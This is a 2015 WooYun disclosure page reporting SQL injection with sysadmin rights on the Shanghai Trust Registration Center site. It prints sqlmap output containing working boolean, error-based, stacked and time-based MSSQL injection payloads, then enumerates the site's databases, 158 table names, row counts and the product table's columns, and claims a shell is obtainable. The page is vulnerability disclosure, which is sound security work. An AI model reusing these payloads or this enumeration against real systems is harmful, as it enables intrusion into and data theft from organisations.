当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142854

漏洞标题:上海信托登记中心SQL注入漏洞(SA权限),泄露大量重要信息

相关厂商:strc.org.cn

漏洞作者: 路人甲

提交时间:2015-09-24 22:19

修复时间:2015-11-09 17:40

公开时间:2015-11-09 17:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

上海信托登记中心SQL注入漏洞(SA权限),泄露大量重要信息...

详细说明:

检测发现是SA权限,权限大大,可以getshell 。。。。
泄露大量产品信息和用户信息。。。。。。
链接:http://**.**.**.**/commix/product/article_info.jsp?contentId=405

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: contentId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: contentId=405' AND 8458=8458 AND 'HYBC'='HYBC
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING 
clause
    Payload: contentId=405' AND 1386=CONVERT(INT,(CHAR(58) CHAR(107) CHAR
(104) C
HAR(99) CHAR(58) (SELECT (CASE WHEN (1386=1386) THEN CHAR(49) ELSE CHAR
(48) END)
) CHAR(58) CHAR(119) CHAR(118) CHAR(100) CHAR(58))) AND 'PRSL'='PRSL
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: contentId=405'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: contentId=405' WAITFOR DELAY '0:0:5'--
---
[20:01:50] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[20:01:50] [INFO] fetching database names
[20:01:50] [INFO] the SQL query used returns 5 entries
[20:01:50] [INFO] retrieved: EFMSS
[20:01:50] [INFO] retrieved: master
[20:01:50] [INFO] retrieved: model
[20:01:50] [INFO] retrieved: msdb
[20:01:50] [INFO] retrieved: tempdb
available databases [5]:
[*] EFMSS
[*] master
[*] model
[*] msdb
[*] tempdb
[20:02:23] [INFO] retrieved: sa
database management system users [1]:
[*] sa
current database:    'EFMSS'
current user:    'sa'
Database: EFMSS
[158 tables]
+--------------------+
| ACCOUNT_INFO       |
| ACCOUNT_QUEUE      |
| ASSET_INFO         |
| ASSURE_CONTRACT    |
| ASSURE_DETAIL      |
| ASSURE_INFO        |
| BAIL_INFO          |
| BILL_INFO          |
| BI_DIMENSIONS      |
| BI_OBEJCT          |
| BI_TEST_DATA       |
| CHECK_INTEGRITY    |
| CLICK_RECORD       |
| CONFIG_CATALOG     |
| CONFIG_CATEGORY    |
| CONFIG_DATA        |
| CONFIG_ELEMENT     |
| CONFIG_MENU        |
| CONFIG_RECORD      |
| CONFIG_REGION      |
| CONTENT_INFO       |
| CONTENT_TYPE       |
| CONTRACT_ADDITION  |
| CONTRACT_CREDIT    |
| CONTRACT_DUEBILL   |
| CONTRACT_HISTORY   |
| CONTRACT_PUTOUT    |
| CONTRACT_REPAYPLAN |
| COOPERATE_FINANCE  |
| CUSTOMER_IMPORTANT |
| CUST_CREDIT        |
| CUST_CREDITSHOW    |
| CUST_RIGHT         |
| D99_CMD            |
| D99_Tmp            |
| EXCELIMP_CATALOG   |
| EXCELIMP_FIELD     |
| EXCEL_DATATEMP     |
| FINANCE_REPORT     |
| FLOW_CATALOG       |
| FLOW_DRIVE         |
| FLOW_DRIVEDRAW     |
| FLOW_NODE          |
| FLOW_NODEDRAW      |
| FLOW_OBJECT        |
| FLOW_OPINION       |
| FLOW_STATE         |
| FLOW_TASK          |
| FLOW_VIEW          |
| FORMPRINT_CATALOG  |
| FORMPRINT_DETAIL   |
| INTEREST_RATEINFO  |
| INTERFACE_CATALOG  |
| INTERFACE_FIELD    |
| INVOICE_INFO       |
| ITEM_APPROVE       |
| ITEM_CHANGE        |
| ITEM_CHECK         |
| ITEM_CLASSIFY      |
| ITEM_CONTRACT      |
| ITEM_DULLPAY       |
| ITEM_EXTEND        |
| ITEM_FLOWPROCESS   |
| ITEM_FUNCHISTORY   |
| ITEM_FUNCTION      |
| ITEM_INFO          |
| ITEM_INFO_TEST     |
| ITEM_PLAN          |
| ITEM_PLANHISTORY   |
| ITEM_PROJECT       |
| ITEM_REPAY         |
| ITEM_RISK          |
| LEVEL_APPDATA      |
| LEVEL_APPRECORD    |
| LEVEL_DRIVE        |
| LEVEL_ITEMINDEX    |
| LEVEL_TYPE         |
| LINKMAN_INFO       |
| LINK_MAN           |
| MESSAGE_INFO       |
| MODIFY_LOGINFO     |
| MYORG_INFO         |
| OBJECT_RELATION    |
| PIC_INFO           |
| PLAN_WEEK          |
| POOL_ASSET         |
| POOL_ASSETCHANGE   |
| POOL_ASSETTREAT    |
| POOL_INFO          |
| POOL_RATECHANGE    |
| POOL_REPAYPLAN     |
| POOL_STANDARD      |
| POST_ACCBALANCE    |
| POST_ACCOUNT       |
| POST_BALANCE       |
| POST_LIST          |
| POST_SUBBALANCE    |
| POST_SUBJECT       |
| POST_TRADE         |
| POST_WARRANT       |
| PRE_ITEM           |
| PRODUCT_ACCOUNT    |
| PRODUCT_AGNCY      |
| PRODUCT_BENEFIT    |
| PRODUCT_BOOK       |
| PRODUCT_CASH       |
| PRODUCT_CHANGE     |
| PRODUCT_DATETIME   |
| PRODUCT_DETAIL     |
| PRODUCT_EVENT      |
| PRODUCT_GROUP      |
| PRODUCT_HISTORY    |
| PRODUCT_HOLDER     |
| PRODUCT_INFO       |
| PRODUCT_ISSUE      |
| PRODUCT_LEVEL      |
| PRODUCT_MUL        |
| PRODUCT_PAYMENT    |
| PRODUCT_RECEIVEPAY |
| PRODUCT_REPAY      |
| PRODUCT_SALE       |
| PRODUCT_TRADE      |
| PRODUCT_TRUST      |
| PRODUCT_TYPE       |
| PRODUCT_VALUE      |
| PROJECT_INFO       |
| TACCTBOOK          |
| TBASETAXRATE       |
| TCASHTYPE          |
| TCUSTFINANCEINFO   |
| TCUSTFINANCEITEM   |
| TCUSTHOLDERS       |
| TCUST_CERT         |
| TDEPARTMENT        |
| TDICTPARAM         |
| TEFGMSCONTROL      |
| TENTCUSTINFO       |
| TENTCWZBINFO       |
| TERRORINFO         |
| TLOGLIST           |
| TOPBOOK            |
| TOPERATOR          |
| TOPROLE            |
| TRADE_INFO         |
| TRECORDATTACHMENTS |
| TREPORTINFO        |
| TROLE              |
| TROLERIGHT         |
| TSYSCONTROL        |
| TSYSTEMINFO        |
| TUSERINFO          |
| TUSETIMES          |
| T_REPORT_DATA      |
| T_REPORT_DATA_T    |
| T_REPORT_FIELD     |
| WORKINFO_CONFIG    |
| WORK_LOG           |
| sysdiagrams        |
+--------------------+


2.png


3.png


4.png


5.png


漏洞证明:

Database: EFMSS
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| dbo.TLOGLIST           | 206845  |
| dbo.PRODUCT_INFO       | 9071    |
| dbo.CONFIG_REGION      | 6193    |
| dbo.INTERFACE_FIELD    | 3122    |
| dbo.FORMPRINT_DETAIL   | 447     |
| dbo.CONTENT_INFO       | 423     |
| dbo.TERRORINFO         | 367     |
| dbo.TENTCUSTINFO       | 185     |
| dbo.INTERFACE_CATALOG  | 170     |
| dbo.TOPBOOK            | 161     |
| dbo.TOPERATOR          | 161     |
| dbo.EXCELIMP_FIELD     | 143     |
| dbo.TCUSTFINANCEITEM   | 132     |
| dbo.CONFIG_CATEGORY    | 111     |
| dbo.T_REPORT_FIELD     | 106     |
| dbo.TREPORTINFO        | 104     |
| dbo.CONTENT_TYPE       | 93      |
| dbo.CONFIG_MENU        | 92      |
| dbo.FLOW_NODE          | 61      |
| dbo.LEVEL_ITEMINDEX    | 55      |
| dbo.FLOW_DRIVE         | 50      |
| dbo.POST_SUBJECT       | 47      |
| dbo.CUST_RIGHT         | 45      |
| dbo.TCASHTYPE          | 45      |
| dbo.PRODUCT_TRADE      | 41      |
| dbo.CHECK_INTEGRITY    | 26      |
| dbo.LEVEL_DRIVE        | 26      |
| dbo.FLOW_OBJECT        | 25      |
| dbo.FORMPRINT_CATALOG  | 24      |
| dbo.FLOW_VIEW          | 16      |
| dbo.PLAN_WEEK          | 15      |
| dbo.PRODUCT_TYPE       | 15      |
| dbo.TOPROLE            | 13      |
| dbo.FLOW_CATALOG       | 12      |
| dbo.D99_Tmp            | 8       |
| dbo.PIC_INFO           | 8       |
| dbo.TDEPARTMENT        | 8       |
| dbo.TROLE              | 7       |
Database: EFMSS
Table: PRODUCT_INFO
[58 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| ASSURE_DESC        | nvarchar |
| BENEFIT_TYPE       | nvarchar |
| BENEFIT_YIELD      | numeric  |
| CLICK_DAYNUM       | int      |
| CLICK_MONTHNUM     | int      |
| CLICK_NUM          | int      |
| CLICK_QUARTERNNUM  | int      |
| CLICK_TENNUM       | int      |
| CLICK_WEEKNUM      | int      |
| CLICK_YEARNUM      | int      |
| CURRENCY_TYPE      | nvarchar |
| CURRENCY_TYPE_NAME | nvarchar |
| END_DATE           | nvarchar |
| END_YIELD          | numeric  |
| FINISH_DATE        | nvarchar |
| FINISH_TYPE        | numeric  |
| IF_COMPLETE        | nvarchar |
| INCOME_TYPE        | nvarchar |
| INDUSTRY_TYPE      | nvarchar |
| INPUT_DEPT         | nvarchar |
| INPUT_TIME         | datetime |
| INPUT_USER         | nvarchar |
| INVEST_MANAGE      | nvarchar |
| INVEST_SUM         | numeric  |
| INVEST_TYPE        | nvarchar |
| IS_ATTACHMENT      | int      |
| ISSUE_ORGID        | nvarchar |
| ISSUE_ORGNAME      | nvarchar |
| ISSUE_ORGSNAME     | nvarchar |
| ISSUE_TERM         | int      |
| MANAGE_BANK        | nvarchar |
| MANAGE_RATE        | nvarchar |
| MANAGE_TYPE        | nvarchar |
| OPEN_TYPE          | nvarchar |
| PIGEONHOLE_DATE    | nvarchar |
| POINT_DESC         | nvarchar |
| PRODUCT_CODE       | nvarchar |
| PRODUCT_ID         | int      |
| PRODUCT_NAME       | nvarchar |
| PRODUCT_PHASE      | nvarchar |
| PRODUCT_STATE      | nvarchar |
| PRODUCT_SUM        | numeric  |
| PRODUCT_TYPE       | nvarchar |
| PRODUCT_TYPE_NAME  | nvarchar |
| PURCHASE_RATE      | nvarchar |
| REDEEM_RATE        | nvarchar |
| REMARK             | nvarchar |
| SELL_ADDR          | nvarchar |
| SELL_ENDDATE       | nvarchar |
| SELL_OBJECT        | nvarchar |
| SELL_STARTDATE     | nvarchar |
| SIMPLE_NAME        | nvarchar |
| START_DATE         | nvarchar |
| START_YIELD        | numeric  |
| STRUCTURE_DESC     | nvarchar |
| TERM_TYPE          | nvarchar |
| TRUST_MANAGER      | nvarchar |
| USE_DESC           | nvarchar |
+--------------------+----------+


5.png


6.png


7.png


修复方案:

过滤。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-25 17:39

厂商回复:


CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无